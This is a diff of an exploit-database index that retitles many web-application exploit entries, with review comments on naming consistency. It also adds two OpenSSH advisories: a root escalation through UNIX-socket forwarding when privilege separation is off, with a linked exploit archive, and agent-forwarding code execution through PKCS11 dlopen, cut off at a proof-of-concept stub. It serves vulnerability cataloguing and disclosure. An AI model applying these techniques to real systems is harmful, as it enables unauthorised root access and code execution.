6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - 'tagname' Parameter SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0
|
||||
6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0
|
||||
6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0
|
||||
6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0
|
||||
6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution",2008-10-01,EgiX,php,webapps,0
|
||||
6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0
|
||||
6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion",2008-10-01,StAkeR,php,webapps,0
|
||||
6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution",2008-10-01,EgiX,php,webapps,0
|
||||
6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - 'file_op' Parameter Remote File Inclusion",2008-10-01,Kad,php,webapps,0
|
||||
6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0
|
||||
6650,platforms/php/webapps/6650.txt,"Link Trader - 'ratelink.php lnkid' SQL Injection",2008-10-01,"Hussin X",php,webapps,0
|
||||
6650,platforms/php/webapps/6650.txt,"Link Trader - 'lnkid' Parameter SQL Injection",2008-10-01,"Hussin X",php,webapps,0
|
||||
6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0
|
||||
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0
|
||||
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
|
||||
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion",2008-10-02,ZeN,php,webapps,0
|
||||
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
|
||||
6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
|
||||
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
|
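Review bot: the renames in this hunk are not applied consistently. Most rows convert '(param)' or 'file param' into the ''param' Parameter' form (6576-6578, 6587-6590, 6598-6606, 6617, 6624, 6629, 6637, 6642, 6645-6648, 6650, 6653, 6655), but five drop the parameter name altogether: 6608 loses 'adid', 6612 loses 'guid', 6613 loses 'id', 6628 loses 'rss' and 6592 loses 'help_file'. Two of those now collide with existing rows: 6592 becomes "X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion" right next to the unchanged 6607 "X7 Chat 2.0.1A1 - Local File Inclusion", and 6612 is reduced to the bare "Pro Chat Rooms 3.0.3 - SQL Injection". Suggest keeping the parameter in the same form as the rest of the hunk, e.g. "Pro Chat Rooms 3.0.3 - 'guid' Parameter SQL Injection". Separately, 6599 gains a version number (1.01) that the old title did not carry; worth confirming it comes from the exploit text.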
@ -19979,7 +19981,7 @@ id,file,description,date,author,platform,type,port
|
|||
7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0
|
||||
7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,php,webapps,0
|
||||
7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0
|
||||
7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0
|
||||
7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,php,webapps,0
|
||||
7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0
|
||||
7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' Parameter SQL Injection",2008-11-15,snakespc,php,webapps,0
|
||||
7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0
|
||||
|
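Review bot: the 7123 rename drops 'SQL Injection', the vector, and keeps only the outcome 'Authentication Bypass', while row 7120 two lines above keeps the '(Authentication Bypass) SQL Injection' form, as do 10831 and 10832 in a later hunk. Pick one form for all of them; if the bypass is achieved through SQL injection the vector is worth keeping, e.g. "X7 Chat 2.0.5 - SQL Injection / Authentication Bypass", using the ' / ' separator the file already uses for multi-class entries such as 6631.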
@ -21467,7 +21469,7 @@ id,file,description,date,author,platform,type,port
|
|||
9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
|
||||
9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0
|
||||
9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0
|
||||
9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0
|
||||
|
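Review bot: 9452 is converted to the ''article' Parameter' form, but 9453 immediately below keeps the old '(UploadID)' style, as do 6659 ('arsaprint.php id') and 7130 ('index.php list') left untouched as context in earlier hunks. Since this commit is normalising titles, touching the neighbouring rows in the same pass would avoid leaving a mix of styles within one screen of the file.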
@ -22127,7 +22129,6 @@ id,file,description,date,author,platform,type,port
|
|||
10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10834,platforms/php/webapps/10834.txt,"Link Trader - (lnkid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0
|
||||
10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10837,platforms/php/webapps/10837.txt,"Quick Poll - 'code.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
|
||||
|
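Review bot: this hunk removes one row without a replacement (header 7 to 6 lines) and the rendering does not mark which one; by elimination against the commit message it is 10834, "Link Trader - (lnkid) SQL Injection" (2009-12-30, Hussin X), which covers the same product, parameter and author as 6650 "Link Trader - 'ratelink.php lnkid' SQL Injection" (2008-10-01), so it is presumably being dropped as a duplicate. Two follow-ups: confirm that platforms/php/webapps/10834.txt is deleted in the same commit (the file list is not visible here), and say so in the commit message, which currently lists the title among the renames with no hint that the id is retired.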
@ -25043,7 +25044,7 @@ id,file,description,date,author,platform,type,port
|
|||
18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0
|
||||
18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0
|
||||
18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,php,webapps,0
|
||||
18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0
|
||||
18037,platforms/php/webapps/18037.rb,"phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0
|
||||
18039,platforms/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,php,webapps,0
|
||||
18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0
|
||||
18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
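Review bot: the renamed 18037 row drops the injected parameter ('start_date') while adding a version ('1.2.10') that the old description did not carry; the parameter name is the most useful detail when triaging a search hit, and the new version should be checked against the target list in 18037.rb before it is recorded. Suggest keeping both, in the quoted form already used by rows such as 27105: "phpScheduleIt 1.2.10 - 'reserve.php' 'start_date' Parameter Arbitrary Code Injection (Metasploit)".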
|
||||
|
@ -26842,7 +26843,7 @@ id,file,description,date,author,platform,type,port
|
|||
24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
|
||||
24239,platforms/php/webapps/24239.txt,"CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
|
||||
24240,platforms/php/webapps/24240.txt,"CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
|
||||
24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0
|
||||
24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0
|
||||
24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 - Null Byte Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0
|
||||
24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0
|
||||
24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0
|
||||
|
@ -27927,7 +27928,7 @@ id,file,description,date,author,platform,type,port
|
|||
26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0
|
||||
26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0
|
||||
26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0
|
||||
26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion",2005-07-25,lwdz,php,webapps,0
|
||||
26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion",2005-07-25,lwdz,php,webapps,0
|
||||
26025,platforms/php/webapps/26025.txt,"Netquery 3.1 - submit.php portnum Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
|
||||
26026,platforms/php/webapps/26026.txt,"Netquery 3.1 - nqgeoip2.php Multiple Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
|
||||
26027,platforms/php/webapps/26027.txt,"Netquery 3.1 - nqgeoip.php step Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
|
||||
|
@ -27940,10 +27941,10 @@ id,file,description,date,author,platform,type,port
|
|||
26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0
|
||||
26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - 'topic.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - 'forums.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - 'post.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - 'announcesys.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,php,webapps,0
|
||||
26045,platforms/php/webapps/26045.txt,"phpList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0
|
||||
26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0
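Review bot: after the rename, 26039 and 26040 lose "Multiple Parameter" and 26041/26042 lose the 'forumid' parameter, so the four BMForum 3.0 rows now read as one XSS per script and can no longer be distinguished from a single-parameter finding; keep "Multiple Parameter" on 26039/26040 and the parameter name on 26041/26042 alongside the quoted script name.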
|
||||
|
@ -28778,8 +28779,8 @@ id,file,description,date,author,platform,type,port
|
|||
27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting",2006-01-16,Preddy,php,webapps,0
|
||||
27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27100,platforms/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
|
||||
27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
|
||||
27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
|
||||
27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
|
||||
27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' 'Username' Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
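Review bot: for 27102 the old description already quoted 'index.php', so the only effect of this rename is to remove the 'search' parameter; a pure loss of information is not a normalisation and should be reverted unless the parameter name was wrong. The same applies to 27103, where the quotes around 'search.php' can be added without dropping "search Parameter".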
|
||||
|
@ -31305,8 +31306,8 @@ id,file,description,date,author,platform,type,port
|
|||
30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0
|
||||
30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0
|
||||
30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0
|
||||
30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
|
||||
30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
|
||||
30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
|
||||
30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
|
||||
30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0
|
||||
30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
|
||||
30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
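Review bot: 30757 loses the 'sources/' directory and 30758 loses the 'INSTALL_X7CHATVERSION' parameter; for 30758 the parameter is the only detail that identifies the injection point in the upgrade script, and 'frame.php' without its directory no longer points at the affected file unambiguously. Suggest "X7 Chat 2.0.4 - 'sources/frame.php' 'room' Parameter Cross-Site Scripting" and the corresponding form for 30758.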
|
||||
|
@ -31983,9 +31984,9 @@ id,file,description,date,author,platform,type,port
|
|||
31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - part/menu.php Multiple Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0
|
||||
31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - cms/includes/header.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - cms/includes/login.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0
|
||||
31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0
|
||||
32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0
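Review bot: the 31825 rename drops the 'outpused' parameter entirely, and 31826/31827 drop the template paths 'newtem/footer/' and 'newtem/header/' that tell a reader these are theme files rather than core scripts; keep the parameter on 31825 and consider keeping the directory in the quoted file name, since a reader who greps the CSV for the path will otherwise miss these rows.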
|
||||
|
@ -32724,9 +32725,9 @@ id,file,description,date,author,platform,type,port
|
|||
33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0
|
||||
33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0
|
||||
33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - gmap.php addr Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0
|
||||
33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Parameter URI redirection",2009-06-27,"599eme Man",php,webapps,0
|
||||
33125,platforms/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' Parameter SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0
|
||||
33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0
|
||||
|
@ -35638,7 +35639,7 @@ id,file,description,date,author,platform,type,port
|
|||
37828,platforms/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps,0
|
||||
37829,platforms/php/webapps/37829.txt,"WordPress Plugin MF Gig Calendar - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0
|
||||
37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0
|
||||
37938,platforms/php/webapps/37938.txt,"OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0
|
||||
37938,platforms/php/webapps/37938.txt,"OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0
|
||||
37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38066,platforms/php/webapps/38066.txt,"WordPress Plugin Video Lead Form - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0
|
||||
38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80
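Review bot: the 37938 rename drops '/www/admin/', which is the detail telling a reader that the affected plugin-index.php sits in the OpenX administration interface (the authentication context changes how the XSS is rated), and it drops the 'parent' parameter; the added version '2.8.10' is not in the old row, so it needs to be checked against the High-Tech Bridge advisory in 37938.txt. Suggest "OpenX 2.8.10 - 'www/admin/plugin-index.php' 'parent' Parameter Cross-Site Scripting".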
|
||||
|
@ -36915,3 +36916,4 @@ id,file,description,date,author,platform,type,port
|
|||
40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
|
||||
40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
|
||||
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
|
||||
40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
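Review bot: the new 40961 row carries no version in "Apache mod_session_crypto - Padding Oracle" although the advisory header inside 40961.py lists affected versions (2.3 to 2.5), a fixed version (2.4.25) and CVE-2016-0736; other rows in this file put the version in the description, so add it here so the entry can be matched against an installed httpd version without opening the file.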
|
||||
26
platforms/linux/local/40962.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010
|
||||
|
||||
This issue affects OpenSSH if privilege separation is disabled (config option
|
||||
UsePrivilegeSeparation=no). While privilege separation is enabled by default, it
|
||||
is documented as a hardening option, and therefore disabling it should not
|
||||
directly make a system vulnerable.
|
||||
|
||||
OpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation
|
||||
is disabled, then on the server side, the forwarding is handled by a child of
|
||||
sshd that has root privileges. For TCP server sockets, sshd explicitly checks
|
||||
whether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if
|
||||
so, requires the client to authenticate as root. However, for UNIX domain
|
||||
sockets, no such security measures are implemented.
|
||||
|
||||
This means that, using "ssh -L", an attacker who is permitted to log in as a
|
||||
normal user over SSH can effectively connect to non-abstract unix domain sockets
|
||||
with root privileges. On systems that run systemd, this can for example be
|
||||
exploited by asking systemd to add an LD_PRELOAD environment variable for all
|
||||
following daemon launches and then asking it to restart cron or so. The attached
|
||||
exploit demonstrates this - if it is executed on a system with systemd where
|
||||
the user is allowed to ssh to his own account and where privsep is disabled, it
|
||||
yields a root shell.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip
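Review bot: the file ends at a zip link but gives no fixed-version or upstream commit reference, unlike 40963.txt in this same change, which closes with a "Fixed in" link; add the fix reference, and state the mitigation that the first paragraph only implies (keep privilege separation enabled, which is the default) as an explicit line, since a reader checking whether an sshd is affected currently has to reconstruct it from the prose. The phrase "The attached exploit" should also be changed to refer to the linked archive, as nothing is attached to the text file.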
|
33
platforms/linux/remote/40963.txt
Executable file
|
@ -0,0 +1,33 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009
|
||||
|
||||
The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.
|
||||
|
||||
This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.
|
||||
|
||||
To reproduce the issue, first create a library that executes some command when it is loaded:
|
||||
|
||||
$ cat evil_lib.c
|
||||
#include <stdlib.h>
|
